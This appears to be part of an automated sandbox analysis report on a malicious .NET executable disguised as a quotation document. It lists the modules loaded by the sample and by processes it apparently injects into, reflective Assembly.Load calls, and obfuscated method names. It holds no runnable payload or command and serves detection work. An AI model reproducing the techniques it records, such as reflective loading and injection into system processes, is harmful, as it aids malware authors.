Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: mssrch.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	.Net Code: uwPwIHcxoN System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION NO REQ-19-000640.exe.35ba508.0.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	.Net Code: uwPwIHcxoN System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION NO REQ-19-000640.exe.35da528.2.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION NO REQ-19-000640.exe.6d00000.6.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	.Net Code: uwPwIHcxoN System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05147750 push cs; ret	0_2_05147751
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A9C388 push esp; ret	0_2_06A9C3CD
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A9D915 push FFFFFF8Bh; iretd	0_2_06A9D917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004149DD push 3B089210h; iretd	10_2_00414A13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004149A3 push 3B089210h; iretd	10_2_00414A13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0041834F push FFFFFF91h; retf	10_2_00418357
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00418378 push esi; iretd	10_2_0041839D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004034A0 push eax; ret	10_2_004034A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040D56B push ss; retf	10_2_0040D56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00401D10 push ds; retf 7C18h	10_2_004020AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040D5F2 push 00000058h; retf	10_2_0040D604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00414758 push ebx; iretd	10_2_0041475B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00415F13 push esi; iretd	10_2_00415F1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00404FBF pushfd ; iretd	10_2_00404FC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0199225F pushad ; ret	10_2_019927F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019927FA pushad ; ret	10_2_019927F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019C09AD push ecx; mov dword ptr [esp], ecx	10_2_019C09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0199283D push eax; iretd	10_2_01992858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01991200 push eax; iretd	10_2_01991369
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E84850 push esi; iretd	13_2_02E8485F
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E84854 push esi; iretd	13_2_02E8485F
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E73900 pushfd ; iretd	13_2_02E73903
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7BEAC push ss; retf	13_2_02E7BEAD
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E7BF33 push 00000058h; retf	13_2_02E7BF45
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E86CB9 push esi; iretd	13_2_02E86CDE
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	Code function: 13_2_02E86C90 push FFFFFF91h; retf	13_2_02E86C98
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0354225F pushad ; ret	15_2_035427F9
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035427FA pushad ; ret	15_2_035427F9
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035709AD push ecx; mov dword ptr [esp], ecx	15_2_035709B6
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_0354283D push eax; iretd	15_2_03542858
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02B90780 push ecx; iretd	15_2_02B90858

Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, PRg8tUaVqJkrx61KIB.cs	High entropy of concatenated method names: 'NxiXYbxgCO', 'J2nXkTpDy3', 'YfJXKk51o0', 'zVOXMqHF5n', 'UVHXE8oulm', 'k7cK7Efk88', 'urZKlr2fZC', 'tVMKx71CbZ', 'CslK6l4wiR', 'k2fKTGTQld'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, AU3iTZQIBZyngZ0qET.cs	High entropy of concatenated method names: 'u4T2n7ydNi', 'hI52KKpVuV', 'iov2Xf0nVI', 'mhI2M8H7sP', 'VLN2c2vxrA', 'yt22EfVXQV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, MAbVBc4F6MrgDAKM0N.cs	High entropy of concatenated method names: 'JiBIIJlys', 'iHxvLIFoI', 'lVl0hkvjp', 'wIO3VHJ5n', 'JmdAg8Ng5', 'LhldIFfbD', 'PON5ug28fnjVPm79UT', 'UrEjPrp0MK1dq0ikH2', 'fEVDRcT5C', 'gDX20dBWo'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, wd4x5TP1uWTaYwrBhp.cs	High entropy of concatenated method names: 'g0FLyOZRTH', 'NXVLAEVqfe', 'DO8LaS4ej4', 'qeWLjexLUI', 'kb6LimH5eV', 'zbILS328pU', 'MRnL8CAXCJ', 'AgOLBxin8c', 'olLLpsAT8P', 'xi1LqVAtND'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	High entropy of concatenated method names: 'gxPCYpxxTN', 'zjVC1x7A1i', 'UoWCkiQwhf', 'h3oCnh9nq5', 'Fq9CKC5WuS', 'E98CX33Ivk', 'Oy4CM9q0QQ', 'ej0CEbEZ6t', 'v39CR1JK5H', 'cdGCfpwjGP'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, TppGZB88OZEPeXtmUZ.cs	High entropy of concatenated method names: 'arUM1fDIgw', 'tQcMnOb04E', 'nCFMXnxoKp', 'mGVXQ0GeQ0', 'CRpXz4gHkk', 'x2PMmErN97', 'fEGMo1unEq', 'sleM4qJou6', 'w15MCm0WM1', 'TRcMwtN25E'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, CHOZhcxrBiqQsssI0C.cs	High entropy of concatenated method names: 'tlFcgumQKE', 'fTIcZXtALV', 'vkNccl9Bks', 'UPqchaCZ4w', 'rg1cNGBRRe', 'HYvc9R1DbR', 'Dispose', 'luPD1LnLTl', 'qssDkqjxuc', 'T9HDnch6NB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, toXJJTzjOen8LC7uM1.cs	High entropy of concatenated method names: 'bVN20ynGuF', 'rPo2yOy00q', 'h8D2A9wnXD', 'E7q2alOTfx', 'gqc2jYJMEi', 'xiy2iyHTgY', 'ryy2SMiDcm', 'FrR29YZ8J2', 'xAk2Wr3XMf', 'si42sgZSfY'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, cCoFjEAPSPckWGQMTF.cs	High entropy of concatenated method names: 'Mw0nvMul4X', 'DaJn0L6uQP', 'g2DnyriU2g', 'VEenARn06R', 'hUtngm6KZP', 'GPHnFhGCBU', 'mdUnZmQnew', 'Sv8nD6Y6xP', 'LFYncRTfn9', 'nbqn21mSMj'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, vBDl25ruLQYGqjRNv9.cs	High entropy of concatenated method names: 'rcpZfBQnvU', 'cwaZuHJoX2', 'ToString', 'eNfZ1m3YqL', 'w0GZkmLYYS', 'XvPZn7icEZ', 'KTHZKL6TdH', 'c7DZX9HK1C', 'ejMZMxSYZ4', 'qavZE7hpjM'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, zjJkSEwok5ev54wghk.cs	High entropy of concatenated method names: 'p67oMRohiC', 'HhyoEISdTI', 'kPSofPckWG', 'YMTouFvW1X', 'oqkogNwPRg', 'LtUoFVqJkr', 'xGlyvtjmkZlErAU0AP', 'caHpNJUPp90TymDG4X', 'USFooEC6BK', 'i2noCxTY4G'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, p03faqTuYnEPlJZiok.cs	High entropy of concatenated method names: 'vItcaPyZkt', 'Xgqcjv1NHE', 'myqcOulqqX', 'Q7TciLYjmS', 'lHOcSRfKnO', 'wtYcUrng35', 'x6Qc88AfBT', 'OGxcBYf8Et', 'aRlc52yj93', 'yaNcp7IKWL'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, Vdw1AcomMVLhZBKWm6A.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pfx2qhsC5q', 'E0b2toZnwp', 'iHS2PfMZAh', 'i5D2VPW3WA', 'NJR2bMdIrM', 'Ew42GHh4uQ', 'CsT2rioSJp'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, AW1XAid6aaFEALqkNw.cs	High entropy of concatenated method names: 'eNTKeDZMIC', 'V9sK3JbkDr', 'dkhnOpqR7f', 'moZnicU5pi', 'UmnnS5e9EY', 'U8JnUBdnLk', 'tqAn8dQK2o', 'wZonB6wM2v', 'A4Hn5Ch3XR', 'rDmnpH5EGB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, UASvVPooGqQL4Q4rGLd.cs	High entropy of concatenated method names: 'pAV2QvC61p', 'gI62ztY0uF', 'FP3hmto0ac', 'vgKho3pgcB', 'EgOh4dM71b', 'zL6hChOZER', 'zFmhwsxevi', 'tBPhYnKHeU', 'p3ah1jPmgl', 'K4YhkQlUCu'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, URohiCyOhyISdTIdfl.cs	High entropy of concatenated method names: 'QxLkV1M92X', 'aj9kbNaA6P', 'n0mkGybDTA', 'uCokrUe06E', 'QXVk7wNifO', 'qjKkl4NBu7', 'bKfkx7QEKF', 'm7Mk6ijxEv', 'tM0kTQMdmA', 'JVekQWmR9v'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, RZvZycl1IErFJBwh51.cs	High entropy of concatenated method names: 'nOtZ6Mc54G', 'OojZQ3YG9s', 'QeDDmHr6bo', 't5ODoFvtqs', 'XtQZqqfPbH', 'xIhZtje5XM', 'T3EZPmF3TK', 'zMDZVx6mW7', 'yPeZb8MOZ4', 'RO9ZGYdrTX'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, apwZEaowF7n4t7cx2tb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gqjHc96Y5C', 'bRvH22UmX5', 'RbjHhlOTbg', 'EPkHH6Z6p2', 'Iu0HNJSsuU', 'FTPHJ5ltua', 'EPyH9jYUGE'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, tsXAIV5gSxSumB0eV6.cs	High entropy of concatenated method names: 'TG2MWIkmrr', 'RgZMsxGZky', 'gGZMIoccp6', 'juOMvN1GbO', 'oRXMe473Mr', 'TenM0AHlHe', 'PLqM33bmOK', 'fnBMySSGYw', 'SjPMA687g3', 'bjyMdgF3xk'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, NJJ9B4kmEBR80V6h7i.cs	High entropy of concatenated method names: 'Dispose', 'IqQoTsssI0', 'YUE4jvjc1W', 'OQTPBIP0gf', 'cJpoQxrVBx', 'IJHozwFEjS', 'ProcessDialogKey', 't7Z4m03faq', 'nYn4oEPlJZ', 'Iok44vU3iT'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.40bd4a8.1.raw.unpack, N4VkTfo42y3TjPxU8K9.cs	High entropy of concatenated method names: 'ToString', 'wD4hysNOsi', 'ErwhAnAtsT', 'EWlhdxFm4s', 'V9hhaS8C6I', 'ghohj2SIv3', 'u7ChOHFhZL', 'TMBhidgaDL', 'LN289m5zUJDZFGHMVqe', 'eNROcXm0QmnZfaZkc2n'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, PRg8tUaVqJkrx61KIB.cs	High entropy of concatenated method names: 'NxiXYbxgCO', 'J2nXkTpDy3', 'YfJXKk51o0', 'zVOXMqHF5n', 'UVHXE8oulm', 'k7cK7Efk88', 'urZKlr2fZC', 'tVMKx71CbZ', 'CslK6l4wiR', 'k2fKTGTQld'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, AU3iTZQIBZyngZ0qET.cs	High entropy of concatenated method names: 'u4T2n7ydNi', 'hI52KKpVuV', 'iov2Xf0nVI', 'mhI2M8H7sP', 'VLN2c2vxrA', 'yt22EfVXQV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, MAbVBc4F6MrgDAKM0N.cs	High entropy of concatenated method names: 'JiBIIJlys', 'iHxvLIFoI', 'lVl0hkvjp', 'wIO3VHJ5n', 'JmdAg8Ng5', 'LhldIFfbD', 'PON5ug28fnjVPm79UT', 'UrEjPrp0MK1dq0ikH2', 'fEVDRcT5C', 'gDX20dBWo'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, wd4x5TP1uWTaYwrBhp.cs	High entropy of concatenated method names: 'g0FLyOZRTH', 'NXVLAEVqfe', 'DO8LaS4ej4', 'qeWLjexLUI', 'kb6LimH5eV', 'zbILS328pU', 'MRnL8CAXCJ', 'AgOLBxin8c', 'olLLpsAT8P', 'xi1LqVAtND'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, Grkk7oEoY2jtSOVGvv.cs	High entropy of concatenated method names: 'gxPCYpxxTN', 'zjVC1x7A1i', 'UoWCkiQwhf', 'h3oCnh9nq5', 'Fq9CKC5WuS', 'E98CX33Ivk', 'Oy4CM9q0QQ', 'ej0CEbEZ6t', 'v39CR1JK5H', 'cdGCfpwjGP'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, TppGZB88OZEPeXtmUZ.cs	High entropy of concatenated method names: 'arUM1fDIgw', 'tQcMnOb04E', 'nCFMXnxoKp', 'mGVXQ0GeQ0', 'CRpXz4gHkk', 'x2PMmErN97', 'fEGMo1unEq', 'sleM4qJou6', 'w15MCm0WM1', 'TRcMwtN25E'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, CHOZhcxrBiqQsssI0C.cs	High entropy of concatenated method names: 'tlFcgumQKE', 'fTIcZXtALV', 'vkNccl9Bks', 'UPqchaCZ4w', 'rg1cNGBRRe', 'HYvc9R1DbR', 'Dispose', 'luPD1LnLTl', 'qssDkqjxuc', 'T9HDnch6NB'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, toXJJTzjOen8LC7uM1.cs	High entropy of concatenated method names: 'bVN20ynGuF', 'rPo2yOy00q', 'h8D2A9wnXD', 'E7q2alOTfx', 'gqc2jYJMEi', 'xiy2iyHTgY', 'ryy2SMiDcm', 'FrR29YZ8J2', 'xAk2Wr3XMf', 'si42sgZSfY'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, cCoFjEAPSPckWGQMTF.cs	High entropy of concatenated method names: 'Mw0nvMul4X', 'DaJn0L6uQP', 'g2DnyriU2g', 'VEenARn06R', 'hUtngm6KZP', 'GPHnFhGCBU', 'mdUnZmQnew', 'Sv8nD6Y6xP', 'LFYncRTfn9', 'nbqn21mSMj'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, vBDl25ruLQYGqjRNv9.cs	High entropy of concatenated method names: 'rcpZfBQnvU', 'cwaZuHJoX2', 'ToString', 'eNfZ1m3YqL', 'w0GZkmLYYS', 'XvPZn7icEZ', 'KTHZKL6TdH', 'c7DZX9HK1C', 'ejMZMxSYZ4', 'qavZE7hpjM'
Source: 0.2.QUOTATION NO REQ-19-000640.exe.4032688.4.raw.unpack, zjJkSEwok5ev54wghk.cs	High entropy of concatenated method names: 'p67oMRohiC', 'HhyoEISdTI', 'kPSofPckWG', 'YMTouFvW1X', 'oqkogNwPRg', 'LtUoFVqJkr', 'xGlyvtjmkZlErAU0AP', 'caHpNJUPp90TymDG4X', 'USFooEC6BK', 'i2noCxTY4G'
